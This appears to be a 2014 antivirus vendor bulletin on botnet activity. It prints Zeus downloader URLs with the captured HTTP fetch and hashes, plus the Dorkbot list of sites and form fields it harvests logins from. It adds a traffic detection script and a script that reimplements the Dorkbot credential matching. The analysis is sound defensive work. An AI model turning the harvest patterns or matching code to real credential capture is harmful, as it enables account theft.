Lavasoft Security Bulletin - May 2014: Bot Review
Bot Review
Table: Bots under analysis (May 2014, Lavasoft MAS). The last column is the change in each bot's share of the monthly total, in percentage points, not the change in sample count.

| Bot name | April 2014 | May 2014 | Change in share (pp) |
|---|---|---|---|
| Zbot | 568 | 149 | -51.3 |
| Cycbot | 10 | 19 | +1.1 |
| Kelihos | 68 | 472 | +49.4 |
| NrgBot/Dorkbot | 149 | 169 | +2.4 |
| Blazebot/Rbot | 5 | 2 | -0.4 |
| Shiz | 7 | 6 | -0.1 |
| Total | 807 | 818 | |
Bot distribution in May (chart not reproduced).
Kelihos. This month we see a significant increase in Kelihos backdoors discovered in the Lab: 58% of all bots in May against 8% in April. Read more about the anti-analysis techniques adopted by the Kelihos bot in "Kelihos Adopts Anti-Analysis Technique" (linked below).
Cycbot. You can find the latest Cycbot description here.
Shiz. The latest description is here.
Zbot. Read more about the Zeus variant found in May in the Malware Encyclopedia. 30% of all Zeus samples detected this month use a Tor client.
Zeus continues to download its components in encrypted form:
| URL | IP |
|---|---|
| hxxp://highclassdelhiescorts.in/images/css/al0302.enc | (shown as an image in the original; not reproduced) |
| hxxp://manjena.com/images/al0302.enc | (shown as an image in the original; not reproduced) |
This time the Canadian server replied with the "ZZP" file (329,288 bytes). Note the custom User-Agent string, "Updates downloader", and the .enc payload served as text/plain: both are usable as network indicators for this downloader.
```text
GET /images/al0302.enc HTTP/1.1
Accept: text/*, application/*
User-Agent: Updates downloader
Host: manjena.com
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Sat, 24 May 2014 06:00:28 GMT
Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.6
Last-Modified: Mon, 03 Feb 2014 15:36:31 GMT
ETag: "a548037-50648-4f18249ad9dc0"
Accept-Ranges: bytes
Content-Length: 329288
Connection: close
Content-Type: text/plain

ZZP..~.:.T.tS...W.......S..vS..OJ.)w_..w....Z...S...r... ...!...2..W0.
..<..w1...&...S..3....<D..}..}w.GwWF:..'T....X..3 Q..3...pl6.wT.
..U6.upP.x|.TM...p[6..S...0..HFo.w...;R..P[. %V.!wP..|R..w;.....C~...u
CD..V..d...wS..1R...P..qQ^".2..x....FB.qP..w.m.w{..q..usr..o.H...G@.F.
<<< skipped >>>
```
After decryption with the Zeus decryption tool (ZeusDecryptor), the payload turns out to be the usual randomly named executable (MD5: f1f03b73b6c32ef28514d740073a4941, 386,560 bytes), dropped as:
%Documents and Settings%\%current user%\Application Data\Idaz\ecyche.exe
The downloader also copies itself to the %Temp% folder as "pdfupdate.exe" (MD5: 0a2947abe4c9e6d539066993690c8a38, 19,224 bytes) and executes that copy.
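The exchange above carries several network-level indicators that a proxy log or a PCAP review can pick up without decrypting anything. The following Python script is an added example, not Lavasoft's tooling and not part of the original bulletin: it parses one captured request/response pair, flags the "Updates downloader" User-Agent, the .enc path, a binary body served as text/plain and any Content-Length mismatch, and hashes the body so it can be compared with the MD5s published in this bulletin. The request and response bytes are constructed to mirror the headers shown above; the body is a short stand-in rather than the real 329,288-byte payload, so its hash will not match anything on this page. The indicator lists and the 30% non-printable threshold are assumptions to tune per environment.

```python
"""Flag the Zeus-style encrypted download pattern in a captured HTTP transaction.

Added example; not Lavasoft's code. Sample bytes below are constructed to
mirror the headers on the page; the body is a stand-in, not the real payload.
"""
import hashlib

# Constructed sample request: headers copied from the exchange on the page.
SAMPLE_REQUEST = (
    b"GET /images/al0302.enc HTTP/1.1\r\n"
    b"Accept: text/*, application/*\r\n"
    b"User-Agent: Updates downloader\r\n"
    b"Host: manjena.com\r\n"
    b"Cache-Control: no-cache\r\n\r\n"
)

# Constructed stand-in body: the "ZZP" marker seen in the dump followed by
# filler bytes that are mostly non-printable, like the real payload.
SAMPLE_BODY = b"ZZP\x00\x7e\x9a\x3a\x11" + bytes(range(256)) * 4

SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Date: Sat, 24 May 2014 06:00:28 GMT\r\n"
    b"Content-Length: " + str(len(SAMPLE_BODY)).encode() + b"\r\n"
    b"Connection: close\r\n"
    b"Content-Type: text/plain\r\n\r\n" + SAMPLE_BODY
)

# Indicators taken from the exchange on the page (assumed starting set).
SUSPECT_USER_AGENTS = {"updates downloader"}
SUSPECT_EXTENSIONS = (".enc",)


def parse_http(raw: bytes):
    """Split an HTTP message into (start line, {lowercased header: value}, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def looks_binary(body: bytes, threshold: float = 0.30) -> bool:
    """True when more than `threshold` of the bytes are outside printable ASCII."""
    if not body:
        return False
    printable = set(range(0x20, 0x7F)) | {0x09, 0x0A, 0x0D}
    nonprint = sum(1 for b in body if b not in printable)
    return nonprint / len(body) > threshold


def check_transaction(request: bytes, response: bytes) -> dict:
    """Return the indicators found in one request/response pair."""
    req_line, req_headers, _ = parse_http(request)
    _status, resp_headers, body = parse_http(response)
    path = req_line.split(" ")[1]
    findings = []
    if req_headers.get("user-agent", "").lower() in SUSPECT_USER_AGENTS:
        findings.append("suspect User-Agent")
    if path.lower().endswith(SUSPECT_EXTENSIONS):
        findings.append("encrypted payload extension")
    ctype = resp_headers.get("content-type", "").lower()
    if ctype.startswith("text/") and looks_binary(body):
        findings.append("binary body served as " + ctype)
    declared = resp_headers.get("content-length")
    if declared is not None and int(declared) != len(body):
        findings.append("Content-Length mismatch")
    return {
        "host": req_headers.get("host"),
        "path": path,
        "md5": hashlib.md5(body).hexdigest(),  # compare with published sample hashes
        "magic": body[:3],
        "findings": findings,
    }


if __name__ == "__main__":
    print(check_transaction(SAMPLE_REQUEST, SAMPLE_RESPONSE))
```

The body-vs-Content-Type check is the one worth keeping even after the User-Agent string changes: a `.enc` blob declared as `text/plain` is a server-side mistake the bot operator has little reason to fix.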
NrgBot/Dorkbot. The number of Dorkbot samples has been growing since March. You can find the latest description here.
Currently the backdoor uses the following wildcard expressions to steal logins and passwords for popular services. URL patterns for the targeted sites are interleaved with the names of the HTTP form fields it harvests from matching requests:
iknowthatgirl*/members*, *youporn.*/login*, *members.brazzers.com*, *bcointernacional*login*, *:2222/CMD_LOGIN*, *whcms*dologin* , *:2086/login*, *:2083/login*, *:2082/login*, *webnames.ru/*user_login*, Webnames, *dotster.com/*login*, loginid, *enom.com/login*, login.Pass, login.User, *login.Pass=*, *1and1.com/xml/config*, *moniker.com/*Login*, LoginPassword, LoginUserName, *LoginPassword=*, *namecheap.com/*login*, loginname, *godaddy.com/login*, Password, *Password=*, *alertpay.com/login*, *netflix.com/*ogin*, *thepiratebay.org/login*, *torrentleech.org/*login*, *vip-file.com/*/signin-do*, *sms4file.com/*/signin-do*, *letitbit.net*, *what.cd/login*, *oron.com/login*, *filesonic.com/*login*, *speedyshare.com/login*, *uploaded.to/*login*, *uploading.com/*login*, loginUserPassword, loginUserName, *loginUserPassword=*, *fileserv.com/login*, *hotfile.com/login*, *4shared.com/login*, txtpass, *txtpass=*, *netload.in/index*, *freakshare.com/login*, login_pass, *login_pass=*, *mediafire.com/*login*, *sendspace.com/login*, *megaupload.*/*login*, *depositfiles.*/*/login*, *signin.ebay*SignIn, *officebanking.cl/*login.asp*, *secure.logmein.*/*logincheck*, session[password], *password]=*, *twitter.com/sessions, txtPassword, *&txtPassword=*, *.moneybookers.*/*login.pl, *runescape*/*weblogin*, *&password=*, *no-ip*/login*, *steampowered*/login*, quick_password, *hackforums.*/member.php, *facebook.*/login.php*, *login.yahoo.*/*login*, passwd, login, *passwd=*, *login.live.*/*post.srf*, TextfieldPassword, *TextfieldPassword=*, *gmx.*/*FormLogin*, *Passwd=*, FLN-Password, *FLN-Password=*, *pass=*, *bigstring.*/*index.php*, *screenname.aol.*/login.psp*, password, loginId, *password=*, *aol.*/*login.psp*, Passwd, *google.*/*ServiceLoginAuth*, login_password, login_email, *login_password=*, *paypal.*/webscr?cmd=_login-submit*, *bebo.*/c/profile/comment_post.json, *bebo.*/mail/MailCompose.jsp*, *friendster.*/sendmessage.php*, *friendster.*/rpc.php, *vkontakte.ru/mail.php, 
*vkontakte.ru/wall.php, *vkontakte.ru/api.php, *facebook.*/ajax/*MessageComposerEndpoint.php*, msg_text, *facebook.*/ajax/chat/send.php*
The list above targets the following online services:
iknowthatgirl.com, youporn.com, brazzers.com, bancointernacional.com.ec, webnames.ru, dotster.com, enom.com, 1and1.com, moniker.com, namecheap.com, godaddy.com, alertpay.com, netflix.com, thepiratebay.org, torrentleech.org, vip-file.com, sms4file.com, letitbit.net, what.cd, oron.com, filesonic.com, speedyshare.com, uploaded.to, uploading.com, fileserv.com, hotfile.com, 4shared.com, netload.in, freakshare.com, mediafire.com, sendspace.com, megaupload.com, depositfiles.com, ebay.com, officebanking.cl, logmein.com, twitter.com, moneybookers.com, runescape.com, hackforums.com, facebook.com, yahoo.com, live.com, gmx.com, aol.com, google.com, paypal.com, bebo.com, friendster.com, vkontakte.ru
These include adult sites, domain registrars, online banking, file-sharing services, online games, and popular social networks.
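To see what the expression list above actually captures, the following Python script is an added example, not code from Dorkbot or from Lavasoft: it applies a subset of the page's patterns to constructed login requests and returns the URL pattern that fired and the form fields that would be harvested. Only `*` is treated as a wildcard; the page's own entries show why `fnmatch` must not be used here, since `*paypal.*/webscr?cmd=_login-submit*` contains a literal `?` and `session[password]` a literal `[...]`, both of which `fnmatch.translate` would turn into metacharacters. Entries without a `*` are assumed to be exact form-field names; case-insensitive, whole-string matching is also an assumption, since the bulletin does not document the bot's comparison routine. The URLs and POST bodies are constructed.

```python
"""Apply Dorkbot-style wildcard expressions to captured HTTP POSTs.

Added example, not the bot's code. Patterns are a subset of the list on the
page; matching semantics (case-insensitive, whole-string) are an assumption.
"""
import re

# Subset of the page's URL patterns for targeted sites.
URL_PATTERNS = [
    "*godaddy.com/login*",
    "*:2083/login*",
    "*paypal.*/webscr?cmd=_login-submit*",
    "*facebook.*/login.php*",
    "*twitter.com/sessions",
    "*login.live.*/*post.srf*",
]

# Subset of the page's form-field entries. Entries with '*' are matched
# against "&name=value"; entries without '*' are exact field names (assumed).
FIELD_PATTERNS = [
    "login_email",
    "*password=*",
    "*pass=*",
    "*&txtPassword=*",
    "*password]=*",
]


def wildcard_to_regex(pattern: str) -> re.Pattern:
    """Compile a pattern where only '*' is special; '?' and '[' stay literal."""
    parts = [re.escape(p) for p in pattern.split("*")]
    return re.compile(".*".join(parts), re.IGNORECASE | re.DOTALL)


_URL_RES = [(p, wildcard_to_regex(p)) for p in URL_PATTERNS]
_FIELD_RES = [(p, wildcard_to_regex(p)) for p in FIELD_PATTERNS if "*" in p]
_FIELD_NAMES = {p.lower() for p in FIELD_PATTERNS if "*" not in p}


def matched_url_pattern(url: str):
    """Return the first URL pattern that matches the whole URL, or None."""
    for pat, rx in _URL_RES:
        if rx.fullmatch(url):
            return pat
    return None


def harvest(url: str, post_body: str) -> dict:
    """Return what a Dorkbot-style hook would capture from one POST."""
    url_pat = matched_url_pattern(url)
    if url_pat is None:
        return {}
    captured = {}
    for field in post_body.split("&"):
        name, _, value = field.partition("=")
        if name.lower() in _FIELD_NAMES:
            captured[name] = value
            continue
        # Leading '&' lets patterns such as '*&txtPassword=*' match the first field too.
        probe = "&" + field
        if any(rx.fullmatch(probe) for _p, rx in _FIELD_RES):
            captured[name] = value
    return {"url_pattern": url_pat, "fields": captured}


# Constructed sample logins (not real traffic).
SAMPLE_POSTS = [
    ("https://sso.godaddy.com/login?app=account",
     "username=alice&password=hunter2&remember=1"),
    ("https://host.example.net:2083/login/?login_only=1",
     "user=root&pass=cpanel123"),
    ("https://www.paypal.com/webscr?cmd=_login-submit&dispatch=abc",
     "login_email=bob%40example.com&login_password=pa55"),
    ("https://twitter.com/sessions",
     "session[username_or_email]=carol&session[password]=s3cret"),
    ("https://www.example.com/login", "user=x&password=y"),
]

if __name__ == "__main__":
    for url, body in SAMPLE_POSTS:
        print(url, "->", harvest(url, body))
```

The same pattern list, run in the other direction over proxy logs, tells a defender which of their users' sessions would have been exposed to a Dorkbot infection; the whole-string semantics matter, since `*twitter.com/sessions` without a trailing `*` does not match a URL with a query string.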
Blazebot/Rbot. The latest description is available in Malware Encyclopedia.
Read also:
Lavasoft Security Bulletin - May 2014: Top Threats.
Kelihos Adopts Anti-Analysis Technique.